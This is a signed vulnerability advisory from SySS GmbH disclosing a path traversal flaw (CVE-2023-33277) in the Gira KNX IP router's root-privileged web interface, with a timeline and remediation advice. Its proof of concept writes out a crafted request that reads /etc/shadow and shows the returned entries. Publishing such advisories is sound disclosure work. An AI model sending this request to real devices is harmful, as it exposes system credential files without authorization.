-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-015 Product: Gira KNX IP router Manufacturer: Gira Giersiepen GmbH & Co. KG Affected Version(s): 3.1.3683.0, 3.3.8.0 Tested Version(s): 3.1.3683.0, 3.3.8.0 Vulnerability Type: Path Traversal (CWE-22) Risk Level: High Solution Status: Unknown Manufacturer Notification: 2023-05-11 Solution Date: Unknown Public Disclosure: 2023-06-28 CVE Reference: CVE-2023-33277 Author of Advisory: Marc Gessler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Gira KNX IP router is a connection device for KNX lines for data transmission over the Internet Protocol. The manufacturer describes the product as follows (see [1]): > Connection of KNX lines with aid of data networks and use of the Internet protocol (IP). > Coupling of a KNX system together with the Gira HomeServer or Gira FacilityServer. > Filtering and forwarding of telegrams. > Use as line or area coupler. [...] Due to insufficient validation of user-provided input, it is vulnerable to path traversal attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: A path traversal vulnerability was discovered on the product's web interface. By sending a specially crafted HTTP request to the web interface, files and directories outside the web root can be read and sensitive information can be accessed. Furthermore, as the web interface is running with root privileges, it is possible to read sensitive files, for example "/etc/shadow". ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Request: GET /../../../../../etc/shadow HTTP/1.1 Response: root:abcdefghijklmn:10933:0:99999:7::: bin:*:10933:0:99999:7::: daemon:*:10933:0:99999:7::: adm:*:10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: ftp:*:10933:0:99999:7::: nobody:*:10933:0:99999:7::: default:abcdefghijklmn:10933:0:99999:7::: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Validate all user-supplied path values on the server side and do not allow access to directories outside the web root or to other sensitive files. Additionally, validate if the web interface must be run with root privileges. If these privileges are not required, run the web interface with lower privileges. More information can be found at: https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-05-09: Vulnerability discovered 2023-05-11: Vulnerability reported to manufacturer 2023-06-28: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Gira KNX IP router https://katalog.gira.de/en/datenblatt.html?id=658626 [2] SySS Security Advisory SYSS-2023-015 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-015.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Marc Gessler of SySS GmbH. E-Mail: marc.gessler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/marc_gessler.asc Key ID: 0x5077DCEB1C98D0A2 Key Fingerprint: 3F7B B558 6734 8FCF 25A0 F596 5077 DCEB 1C98 D0A2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEP3u1WGc0j88loPWWUHfc6xyY0KIFAmSakncACgkQUHfc6xyY 0KLsbA//SKwpRlX9XHBGHytPQ4D5yQquzth2hh48HHpb8X8GrbHccKlLsyPOAZIn K3+s7ECGWZVAoAptncZvsmf+V2eNqS4Zdi5mWryoXhQy15Rvu4QiSf/iOLrJNjIp kHX98PUBlZkBlpYu22FJf7F+Av2WTfKOfDni4GFrf4infN/7WNw60utVTrrdV2x1 w0s3O8HHo9HvIdeH5c7xvMcXzvxWWkdZ2X/Df3t4ShB6PGVJ2MXRa3dAnQoo8STP FvBOBceJIeZj5q3f+rvSRK1Yxh8gvaidKsRrG9J2E8R/rh5A/LWq75DuOmhbfV55 +B4yPFFSQq0e5kANcv+4SiZdP63OjsNHI54LG3wkEOdbFXxkIzpeUkqTrlE2nXkt wSzvpcnoOA/GKh/iWPMNWhMoPnsN4CKzSx0rTvYAXIcXjrfgBUck6j5rbOLOnEHt aZVJybEhR789NzzIfAH0AXBPB63W2FKumAQe7wNMWVCZin4sWainjsOA275KOngz OrmRzCP/g875XjgV2X028f5BpwrWVak/qr6OLwGPPb9FVdC424eNl1+ydf2CYoCe 5q2aEr+wHBZrcqeX0yZUzKBTTQSCMfW5aCu707CWw6dLmYpIm7j0LPembdwV9UqM ttl27qBHNuyZswx60TrKJ4joDgn4nuqicMpP+L/PIN6sO7J8C1A= =hgEB -----END PGP SIGNATURE-----